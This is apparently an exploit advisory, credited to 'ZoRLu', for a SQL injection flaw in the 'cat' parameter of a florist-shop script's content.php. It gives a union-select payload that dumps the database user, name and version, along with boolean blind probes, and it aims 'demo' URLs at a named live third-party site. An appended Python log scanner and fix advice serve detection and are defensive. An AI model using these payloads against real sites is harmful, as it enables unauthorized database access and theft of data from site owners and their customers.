[~] abarcar Florist Shop System Script content.php (cat) Blind/Remote SQL Injection
[~]
[~] script: http://www.abarcar.com/content_18.php
[~]----------------------------------------------------------
[~] Discovered By: ZoRLu msn: trt-turk@hotmail.com
[~]
[~] Date: 31.12.2008
[~]
[~] Home: www.z0rlu.blogspot.com / www.experl.com
[~]
[~] NOTE: LONELINESS LOST ITS MEANING IN MY LONELINESS : ( (
[~] -----------------------------------------------------------

Exploit: ( remote )

http://localhost/script_path/content.php?cat=[SQL]

[SQL]=

-9999999999999+union+select+0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,unhex(hex(concat(user(),0x3a,database(),0x3a,version())))--

exploit for demo: ( the output appears in the page title )

http://www.angelstouch.com/content.php?cat=-9999999999999+union+select+0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,unhex(hex(concat(user(),0x3a,database(),0x3a,version())))--

Exploit: ( blind )

http://localhost/script_path/content.php?cat=125+and+substring(@@version,1,1)=4 ( true )

http://localhost/script_path/content.php?cat=125+and+substring(@@version,1,1)=3 ( false )

exploit for demo:

https://www.angelstouch.com/content.php?cat=125+and+substring(@@version,1,1)=4 ( true )

https://www.angelstouch.com/content.php?cat=125+and+substring(@@version,1,1)=3 ( false )

[~]----------------------------------------------------------------------
[~] Greetz tO: yildirimordulari.org & experl.com
[~]
[~]----------------------------------------------------------------------
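
For sites running this script, the two request shapes above can be found in web server access logs. The following is an added detection example, not part of the original advisory or the vendor's code: it flags content.php requests whose cat value is not a plain number. It assumes legitimate cat values are always numeric ids (as in cat=125), that logs are in common/combined format, and the sample log lines, client addresses and function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (client IPs, times and sizes are made up).
SAMPLE_LOG = [
    '192.0.2.10 - - [31/Dec/2008:10:00:01 +0000] "GET /content.php?cat=125 HTTP/1.1" 200 5120',
    '192.0.2.44 - - [31/Dec/2008:10:00:07 +0000] "GET /content.php?cat=125+and+substring(@@version,1,1)=4 HTTP/1.1" 200 5120',
    '192.0.2.44 - - [31/Dec/2008:10:00:08 +0000] "GET /content.php?cat=125+and+substring(@@version,1,1)=3 HTTP/1.1" 200 812',
    '192.0.2.44 - - [31/Dec/2008:10:00:15 +0000] "GET /content.php?cat=-9999999999999+union+select+0,1,2,unhex(hex(concat(user(),0x3a,database())))-- HTTP/1.1" 200 5301',
    '192.0.2.10 - - [31/Dec/2008:10:01:00 +0000] "GET /index.php?cat=abc HTTP/1.1" 200 900',
]

REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
UNION = re.compile(r'\bunion\b.*\bselect\b', re.I | re.S)
BOOLEAN = re.compile(r'\b(?:and|or)\b.*(?:substring|substr|mid|ascii|@@)', re.I | re.S)

def classify_cat(value):
    """Return None for a clean numeric id, else a label for the anomaly."""
    if re.fullmatch(r'\d+', value):
        return None
    if UNION.search(value):
        return 'union-select'
    if BOOLEAN.search(value):
        return 'boolean-probe'
    return 'non-numeric'

def scan(lines):
    """Return (client, label, decoded cat) for suspicious content.php requests."""
    findings = []
    for line in lines:
        m = REQUEST.match(line)
        if not m:
            continue
        client, target = m.groups()
        url = urlsplit(target)
        if not url.path.endswith('/content.php'):
            continue
        # parse_qs URL-decodes the value, so '+' and %xx encodings are normalised
        for value in parse_qs(url.query, keep_blank_values=True).get('cat', []):
            label = classify_cat(value)
            if label:
                findings.append((client, label, value))
    return findings

if __name__ == '__main__':
    for client, label, value in scan(SAMPLE_LOG):
        print(client, label, value)
```

Any hit means the parameter is reaching the application unvalidated; the durable fix is to cast cat to an integer or bind it in a parameterized query before it is used in SQL.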